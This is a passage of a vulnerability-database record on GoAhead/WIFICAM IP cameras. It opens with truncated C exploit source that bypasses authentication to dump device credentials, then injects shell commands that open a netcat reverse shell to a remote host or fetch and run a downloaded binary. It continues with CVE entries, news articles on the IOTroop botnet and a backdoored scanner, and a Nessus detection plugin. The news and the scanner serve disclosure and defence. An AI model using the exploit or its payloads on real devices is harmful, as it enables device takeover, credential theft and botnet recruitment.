/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\n\r\n#define ALTERNATIVE_PAYLOAD_zero0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+\" REMOTE_HOST \"+\" REMOTE_PORT \"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define ALTERNATIVE_PAYLOAD_zero1 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://\" REMOTE_HOST \"/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\nchar * creds(char *argv,\r\n int get_config);\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[]);\r\n\r\n\r\nint main(int argc,\r\n char **argv,\r\n char **envp)\r\n{\r\n char *id;\r\n\r\n printf(\"Camera 0day root RCE with connect-back @PierreKimSec\\n\\n\");\r\n\r\n if (argc < 2)\r\n {\r\n printf(\"%s target\\n\", argv[0]);\r\n printf(\"%s target --get-config will dump the configuration and exit\\n\", argv[0]);\r\n return (1);\r\n }\r\n\r\n if (argc == 2)\r\n printf(\"Please run `nc -vlp %s` on %s\\n\\n\", REMOTE_PORT, REMOTE_HOST);\r\n\r\n if (argc == 3 && !strcmp(argv[2], \"--get-config\"))\r\n id = creds(argv[1], 1);\r\n else\r\n id = creds(argv[1], 0);\r\n\r\n if (id == NULL)\r\n {\r\n printf(\"exploit failed\\n\");\r\n return (1);\r\n }\r\n printf(\"done\\n\");\r\n\r\n printf(\" login = %s\\n\", id);\r\n printf(\" pass = %s\\n\", id + 32);\r\n\r\n if (!rce(argv[1], id, PAYLOAD_0, \"planting\"))\r\n printf(\"done\\n\");\r\n sleep(1);\r\n if (!rce(argv[1], id, PAYLOAD_1, \"executing\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_2, \"cleaning\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_1, \"cleaning\"))\r\n printf(\"done\\n\");\r\n\r\n printf(\"[+] enjoy your root shell on %s:%s\\n\", REMOTE_HOST, REMOTE_PORT);\r\n\r\n return (0);\r\n}\r\n\r\n\r\nchar * creds(char *argv,\r\n int get_config)\r\n{\r\n int sock;\r\n int n;\r\n struct sockaddr_in serv_addr;\r\n char buf[8192] = { 0 };\r\n char *out;\r\n char *tmp;\r\n char payload[] = \"GET /system.ini?loginuse&loginpas HTTP/1.0\\r\\n\\r\\n\";\r\n int old_n;\r\n int n_total;\r\n\r\n\r\n sock = 0;\r\n n = 0;\r\n old_n = 0;\r\n n_total = 0;\r\n\r\n printf(\"[+] bypassing auth ... \");\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (NULL);\r\n }\r\n\r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"creds: connect failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"creds: send failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (!(tmp = malloc(10 * 1024 * sizeof(char))))\r\n return (NULL);\r\n\r\n if (!(out = calloc(64, sizeof(char))))\r\n return (NULL);\r\n\r\n while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)\r\n {\r\n n_total += n;\r\n if (n_total < 1024 * 10)\r\n memcpy(tmp + old_n, buf, n);\r\n if (n >= 0)\r\n old_n = n;\r\n }\r\n\r\n close(sock);\r\n\r\n /*\r\n [ HTTP HEADERS ]\r\n ...\r\n\r\n 000????: 0000 0a0a 0a0a 01.. .... .... .... ....\r\n ^^^^ ^^^^ ^^\r\n Useful reference in the binary data\r\n in order to to find the positions of\r\n credentials\r\n ...\r\n ... \r\n 0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n 00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n ...\r\n\r\n NOTE: reference can be too:\r\n 000????: 0006 0606 0606 0100 000a .... .... ....\r\n\r\n Other method: parse everything, find the \"admin\" string and extract the associated password\r\n by adding 31bytes after the address of 'a'[dmin].\r\n Works if the login is admin (seems to be this by default, but can be changed by the user)\r\n */\r\n\r\n if (get_config)\r\n {\r\n for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)\r\n printf(\"%c\", tmp[j]);\r\n exit (0);\r\n }\r\n\r\n\r\n for (unsigned int j = 50; j < 10 * 1024; j++)\r\n {\r\n if (tmp[j - 4] == 0x0a &&\r\n tmp[j - 3] == 0x0a &&\r\n tmp[j - 2] == 0x0a &&\r\n tmp[j - 1] == 0x0a &&\r\n tmp[j] == 0x01)\r\n {\r\n if (j + 170 < 10 * 1024)\r\n {\r\n strcat(out, &tmp[j + 138]);\r\n strcat(out + 32 * sizeof(char), &tmp[j + 170]);\r\n free(tmp);\r\n\r\n return (out);\r\n }\r\n }\r\n }\r\n\r\n free(tmp);\r\n\r\n return (NULL);\r\n}\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[])\r\n{\r\n int sock;\r\n struct sockaddr_in serv_addr;\r\n char *payload;\r\n\r\n if (!(payload = calloc(512, sizeof(char))))\r\n return (1);\r\n\r\n sock = 0;\r\n\r\n printf(\"[+] %s payload ... \", desc);\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (1);\r\n }\r\n\r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (1);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"rce: connect failed\\n\");\r\n return (1);\r\n }\r\n\r\n\r\n sprintf(payload, attack, id, id + 32);\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"rce: send failed\\n\");\r\n return (1);\r\n }\r\n\r\n return (0);\r\n}\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92748"}], "cve": [{"lastseen": "2017-05-06T07:45:02", "bulletinFamily": "NVD", "description": "Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET.", "modified": "2017-05-05T09:38:59", "published": "2017-04-25T16:59:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8224", "id": "CVE-2017-8224", "type": "cve", "title": "CVE-2017-8224", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-06T07:45:02", "bulletinFamily": "NVD", "description": "Wireless IP Camera (P2P) WIFICAM devices have an \"Apple Production IOS Push Services\" private RSA key and certificate stored in /system/www/pem/ck.pem inside the firmware, which allows attackers to obtain sensitive information.", "modified": "2017-05-05T09:39:22", "published": "2017-04-25T16:59:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8222", "id": "CVE-2017-8222", "type": "cve", "title": "CVE-2017-8222", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-05-06T07:45:02", "bulletinFamily": "NVD", "description": "On Wireless IP Camera (P2P) WIFICAM devices, an attacker can use the RTSP server on port 10554/tcp to watch the streaming without authentication via tcp/av0_1 or tcp/av0_0.", "modified": "2017-05-05T09:39:38", "published": "2017-04-25T16:59:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8223", "id": "CVE-2017-8223", "type": "cve", "title": "CVE-2017-8223", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-05-06T07:45:02", "bulletinFamily": "NVD", "description": "On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.", "modified": "2017-05-05T09:41:22", "published": "2017-04-25T16:59:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8225", "id": "CVE-2017-8225", "type": "cve", "title": "CVE-2017-8225", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-05-06T07:45:02", "bulletinFamily": "NVD", "description": "Wireless IP Camera (P2P) WIFICAM devices rely on a cleartext UDP tunnel protocol (aka the Cloud feature) for communication between an Android application and a camera device, which allows remote attackers to obtain sensitive information by sniffing the network.", "modified": "2017-05-05T09:40:56", "published": "2017-04-25T16:59:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8221", "id": "CVE-2017-8221", "type": "cve", "title": "CVE-2017-8221", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:19", "bulletinFamily": "info", "description": "Hackers moved one step closer to launching full-scale DDoS attacks using millions of IoT devices herded into the botnet known as [Reaper or IOTroop](<https://threatpost.com/iotroop-botnet-could-dwarf-mirai-in-size-and-devastation-says-researcher/128560/>).\n\nResearchers at NewSky Security warn that hackers are swapping scripts on forums that can scan the internet for vulnerable IoT devices and dump default or weak credentials from them.\n\n\u201cThis is an important next step for hackers who have taken the concept of an attack and turned it into the foundation of a real one,\u201d said Ankit Anubhav, principal security researcher at NewSky Security.\n\nAnubhav\u2019s investigation led him to an underground forum where a pair of hackers demonstrated a script that exploited a [vulnerability in a China-built wireless camera resold by many vendors](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>).\n\n\u201c(The hackers) have scripts related to a weaponized CVE-2017-8225 exploit along with screenshots of the script in action,\u201d Anubhav [wrote in a blog post explaining his research](<https://blog.newskysecurity.com/a-huge-wave-of-iot-zombies-are-coming-42d61d6cada0>).\n\nNewSky Security\u2019s research adds to Check Point\u2019s previous IOTroop research [published last week](<https://threatpost.com/iotroop-botnet-could-dwarf-mirai-in-size-and-devastation-says-researcher/128560/>) that warned the botnet (and corresponding malware) was recruiting a global army of connected devices.\n\nIn its report, Check Point warned that one million IoT devices were already infected with IOTroop malware and 60 percent of corporate networks contained a device vulnerable to one of several vulnerabilities exploitable by adversaries behind the malware. NewSky Security said attackers have moved beyond recruiting bots and are actively developing attack scripts.\n\nThe IOTroop malware targets poorly protected connected devices such as routers and wireless IP cameras manufactured by D-Link, TP-Link, Avtech, Netgear, MikroTik, Linksys, Synology and GoAhead. But because IOTroop doesn\u2019t just exploit default credentials to compromise devices, as did Mirai, it has the potential to do more damage exploiting nearly a dozen vulnerabilities.\n\nLast year, a Mirai botnet attack flooded [DNS provider Dyn](<https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/>) causing several well-known websites to go dark for hours.\n\nIn his investigation Anubhav said he reviewed two IOTroop scripts made available by hackers including one that exploited [CVE-2017\u20138225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8225>), a known bypass authentication vulnerability affecting the wireless IP cameras.\n\n\u201cThe first script uses a Shodan query to dump all IP addresses that are devices vulnerable to CVE-2017\u20138225 by using a known Shodan dork (query),\u201d NewSKy wrote in its report. \u201cNow once all vulnerable IPs are collected, the second script uses CVE-2017\u20138225 to dump credentials for these devices.\u201d\n\n\u201cThis combination will help script kiddies to take control over a variety of IoT devices without worrying about two important questions: where (to find devices, which can be hacked) and how (to hack these devices),\u201d the report said.\n\nIt was also observed that although the thread in hacking forums started first with scripts which will reveal compromised IOT credentials, it soon shifted toward development of a fully functional botnet which can be propagated. The attackers discussed their inability to perform WGET command, and replaced it with a functional netcat to perform a reverse shell. This was also observed in devices infected by IOTroop by both Check Point and NewSky researchers.\n\nThe one piece missing is scale. According to Anubhav, 117,055 devices are vulnerable to CVE-2017-8225. To effectively reach those devices, hackers needed access to Shodan Premium to scale the recruitment and to weaponize vulnerable IoT devices.\n\n\u201cWe noted the exploit author asking for Shodan credentials, and claiming that if he can get access to Shodan Premium, he will set up a botnet for any purpose,\u201d the researcher said. \u201cSoon we observed that a fellow attacker agreed to share his Shodan credentials with the attacker if it will help him form the botnet. Here onward the thread goes silent. No questions asked, no updates.\u201d\n\nAnubhav said, while the CVE-2017-8225 vulnerability was already known, using the Shodan search engine to find vulnerable devices lowers the bar for an attack.\n\n\u201cA huge number of devices vulnerable via CVE-2017-8225 were simply visible in Shodan, just waiting to be attacked. Without any security or patch, they are now vulnerable to become part of the IoTroop botnet,\u201d Anubhav said.\n\nThe identity of the hackers behind the scripts are unknown. According to Anubhav, the two have a number of different aliases and use accounts that trace back to several countries scattered around the globe making it impossible to determine a country of origin.\n", "modified": "2017-10-25T14:33:18", "published": "2017-10-25T14:33:18", "id": "THREATPOST:31CC1BF1652AEA543504AB09594E8DAB", "href": "https://threatpost.com/hackers-prepping-iotroop-botnet-with-exploits/128608/", "type": "threatpost", "title": "Hackers Prepping IOTroop Botnet with Exploits", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:28:21", "bulletinFamily": "info", "description": "A botnet, which is adding new bots every day, has already infected one million businesses during the past month and could easily eclipse the size and devastation caused by Mirai.\n\nThe malware and botnet, dubbed IOTroop, was spotted in September by researchers at Check Point who warn that 60 percent of corporate networks have at least one vulnerable device.\n\nSimilar to Mirai, the malware targets poorly protected network-connected devices such as routers and wireless IP cameras manufactured by D-Link, TP-Link, Avtech, Netgear, MikroTik, Linksys, Synology and GoAhead.\n\n\u201cSo far we estimate over a million organizations have already been affected worldwide, including the U.S., Australia and everywhere in between, and the number is only increasing,\u201d according to Check Point\u2019s [preliminary research published Thursday](<https://research.checkpoint.com/new-iot-botnet-storm-coming/>).\n\nWhile this malware appears to share some of Mirai\u2019s code, it is new malware and campaign, said Maya Horowitz, group manager of threat intelligence at Check Point, in an interview with Threatpost.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/10/06222318/IoT-Botnet-Trend-of-Attacking-IP-Addresses.png>)\n\n\u201cThis has the potential to be more damaging than Mirai,\u201d Horowitz said. \u201cThis is malware that has a much broader range of vulnerabilities to target across a much larger spectrum of products,\u201d she said.\n\nIn October 2016, [Mirai malware spread itself to IoT devices ](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>)gaining access via default password and usernames. The malware then roped affected devices into a botnet and carried out distributed denial of service (DDoS) attacks. The largest of such attacks flooded [DNS provider Dyn](<https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/>) causing several well-known websites to go dark for hours.\n\nHorowitz said the IOTroop malware Check Point is examining has similarities to Mirai, such as the recruiting of a global army of network devices capable of launching crippling DDoS attacks.\n\n\u201cThe most interesting difference between this malware and Mirai is that it is far more sophisticated. Attackers are not just exploiting default credentials to compromise devices, but also using a dozen or more vulnerabilities to get on these devices,\u201d she said.\n\nIn the case of the GoAhead wireless IP camera, attackers exploited a well known bypass authentication vulnerability ([CVE-2017-8225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8225>)) identified in March and affecting [more than 1,250 camera models](<http://seclists.org/fulldisclosure/2017/Mar/23>). For other devices such as Linksys RangePlus WRT110 Wireless Router, adversaries are exploiting a remote command execution vulnerability known since 2014. [This vulnerability](<https://www.checkpoint.com/defense/advisories/public/2014/cpai-2014-2414.html>) exists because the router\u2019s web interface fails to sanitize ping targets and lacks the use of cross-site request forgery tokens for protection.\n\nResearchers said they have also identified several command-and-control servers used by adversaries behind the malware that update it with ranges of IP addresses to attack.\n\n\u201cEvery infected device gets a range of IP addresses that are used to scan for these dozen or so vulnerabilities,\u201d Horowitz said. \u201cThe malware is mostly self-propagating, with minimal C2 intervention. But we are still studying the malware and reverse engineering it to better understand how it works.\u201d\n\n\u201cWhile we don\u2019t have the completed answers, we do know that the infected devices get a range of IP addresses that the malware is instructed to check for vulnerabilities. And then the IPs of the vulnerable devices are sent back to the C2,\u201d she said.\n\nResearchers believe that the botnet is quickly amassing and may be on the cusp of a massive DDoS attack. \u201cOur research suggests we are now experiencing the calm before an even more powerful storm,\u201d wrote researchers.\n\nStill unknown is who are the threat actors behind the malware/botnet, any targets hackers might have and what the timeline of any attack might be.\n\n\u201cIt is too early to assess the intentions of the threat actors behind it, but it is vital to have the proper preparations and defense mechanisms in place before an attack strikes,\u201d said researchers.\n", "modified": "2017-10-20T14:17:27", "published": "2017-10-20T14:17:27", "id": "THREATPOST:D2E45A61AF79D195D55671053FCCC5BA", "href": "https://threatpost.com/iotroop-botnet-could-dwarf-mirai-in-size-and-devastation-says-researcher/128560/", "type": "threatpost", "title": "\u2018IOTroop\u2019 Botnet Could Dwarf Mirai in Size and Devastation, Says Researcher", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:32:13", "bulletinFamily": "scanner", "description": "The remote server uses a version of GoAhead that allows a remote unauthenticated attacker to download the system.ini file. This file contains credentials to the web interface, ftp interface, and others.", "modified": "2018-06-14T00:00:00", "id": "GOAHEAD_PASSWORD_LEAK.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=102174", "published": "2017-08-03T00:00:00", "title": "GoAhead System.ini Leak", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102174);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-8225\");\n\n script_name(english:\"GoAhead System.ini Leak\");\n script_summary(english:\"Extracts username and password from GoAhead server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote server is vulnerable to an information leak that\ncould allow a remote attacker to learn the admin username and password\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote server uses a version of GoAhead that allows a remote\nunauthenticated attacker to download the system.ini file. This file\ncontains credentials to the web interface, ftp interface, and others.\");\n # http://blog.netlab.360.com/a-new-threat-an-iot-botnet-scanning-internet-on-port-81-en/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ad0d0c84\");\n script_set_attribute(attribute:\"see_also\", value:\"https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"If possible, update the device's firmware and ensure that the HTTP server is\nnot accessible via the internet.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:U/RC:X\");\n\n script_set_attribute(attribute:\"vuln_publication_date\",value:\"2017/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_keys(\"www/goahead\");\n script_require_ports(\"Services/www\", 80, 81, 82, 83);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:81, embedded:TRUE);\nbanner = get_http_banner(port:port);\nif (\"Server: GoAhead-Webs\" >!< banner) audit(AUDIT_WRONG_WEB_SERVER, port, \"GoAhead-Webs\");\n\nuri = '/system.ini';\nres = http_send_recv3(\n method:\"GET\",\n item:uri,\n port:port,\n exit_on_fail:FALSE);\n\nif (isnull(res) || \"401\" >!< res[0])\n{\n # try system-b.ini\n uri = '/system-b.ini';\n res = http_send_recv3(\n method:\"GET\",\n item:uri,\n port:port,\n exit_on_fail:FALSE);\n\n if (isnull(res) || \"401\" >!< res[0])\n {\n audit(AUDIT_WEB_SERVER_NOT_AFFECTED, port);\n }\n}\n\n# We've been blocked from the ini script. Bypass by\n# providing empty creds.\nuri += '?loginuse&loginpas&apos';\nres = http_send_recv3(\n method:\"GET\",\n item:uri,\n port:port,\n exit_on_fail:FALSE);\n\nif (isnull(res) || \"200\" >!< res[0] || len(res[2]) == 0)\n{\n audit(AUDIT_WEB_SERVER_NOT_AFFECTED, port);\n}\n\n# We have a response with a payload. We can verify\n# the payload by looking for some magic bytes that\n# we know exist in the file.\nif (isnull(strstr(res[2], '\\x0a\\x0a\\x0a\\x0a\\x01')))\n{\n audit(AUDIT_WEB_SERVER_NOT_AFFECTED, port);\n}\n\nres[2] = data_protection::sanitize_user_full_redaction(output:res[2]);\n\nsecurity_report_v4(\n port: port,\n severity: SECURITY_WARNING,\n file: uri,\n request: make_list(build_url(qs:uri, port:port)),\n output: chomp(res[2]),\n attach_type: 'text/plain'\n);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2018-01-27T09:17:28", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-Vy0HEiTVyCg/WgP6ZUvskoI/AAAAAAAAuqs/l16VDHFQJIUXXv0KPkfnTK6wrGJMIbjdACLcBGAs/s1600/iot-vulnerability-scanner-script.png>)\n\nNothing is free in this world. \n \nIf you are searching for free hacking tools on the Internet, then beware\u2014most freely available tools, claiming to be the swiss army knife for hackers, are nothing but a scam. \n \nFor example, [Cobian RAT](<https://thehackernews.com/2017/09/backdoored-hacking-tools.html>) and a [Facebook hacking tool](<https://thehackernews.com/2016/02/facebook-hacking-tool.html>) that we previously reported on The Hacker News actually could hack, but of the one who uses them and not the one you desire to hack. \n \nNow, a security researcher has spotted another hacking tool\u2014this time a PHP script\u2014which is freely available on multiple popular underground hacking forums and allows anyone to find vulnerable internet-connected IP Cameras running the vulnerable version of GoAhead embedded web-server. \n \nHowever, after closely analysing the scanning script, Newsky Security researcher Ankit Anubhav found that the tool also contains a secret backdoor, which essentially allows its creator to \"_hack the hacker._\" \n\n\n> \"For an attacker\u2019s point of view, it can be very beneficial to hack a hacker,\" Anubhav [said](<https://blog.newskysecurity.com/script-kiddie-nightmare-iot-attack-code-embedded-with-backdoor-39ebcb92a4bb>).\n\n> \"For example, if a script kiddie owns a botnet of 10,000 IoT and if he gets hacked, the entire botnet is now in control of the attacker who got control of the system of this script kiddie. Hence, by exploiting one device, he can add thousands of botnets to his army.\"\n\nThe rise of IoT botnet and release of [Mirai's source code](<https://thehackernews.com/2016/10/mirai-source-code-iot-botnet.html>)\u2014the biggest [IoT-based malware](<https://thehackernews.com/2016/11/mirai-router-offline.html#search>) threat that emerged last year and [took down Dyn DNS service](<https://thehackernews.com/2016/10/ddos-attack-mirai-iot.html>)\u2014has encouraged criminal hackers to create their massive botnet either to launch DDoS attacks against their targets or to rent them to earn money. \n\n\n[](<https://1.bp.blogspot.com/-rbUS0_INUz4/WgP5tRM2S-I/AAAAAAAAuqk/N7u65SrGoIoCsLbEci72EwGLdes-D-oIgCLcBGAs/s1600/iot-vulnerability-scanner.png>)\n\n \nAs shown in the self-explanatory flowchart, this IoT scanning script works in four steps: \n\n\n * First, it scans a set of IP addresses to find GoAhead servers vulnerable to a previously disclosed authentication bypass vulnerability ([CVE-2017-8225](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html#pre-auth-info-leak-goahead>)) in Wireless IP Camera (P2P) WIFI CAM devices.\n * In the background, it secretly creates a backdoor user account (_username: VM | password: Meme123_) on the wannabe hacker's system, giving the attacker same privilege as root.\n * Script also extracts the IP address of the wannabe hacker, allowing script author to access the compromised systems remotely.\n * Moreover, it also runs another payload on the script kiddie\u2019s system, eventually installing a well-known botnet, dubbed Kaiten.\nThis tool is another example of backdoored hacking tools increasingly being distributed at various underground forums to hack the hacker. \n \nIn September, a backdoored Cobian RAT builder kit was spotted on multiple underground hacking forums for free but was caught containing a backdoored module that aimed to provide the kit's authors access to all of the victim's data. \n \nLast year, we reported about another Facebook hacking tool, dubbed _Remtasu_, that actually was a Windows-based Trojan with the capability to access Facebook account credentials, but of the one who uses it to hack someone else. \n \nThe bottom line: Watch out the free online stuff very carefully before using them.\n", "modified": "2017-11-09T07:03:13", "published": "2017-11-08T19:55:00", "id": "THN:F659F177E9871AC527A9D7C561D7ABDF", "href": "https://thehackernews.com/2017/11/iot-vulnerability-scanner.html", "type": "thn", "title": "Hacker Distributes Backdoored IoT Vulnerability Scanning Script to Hack Script Kiddies", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}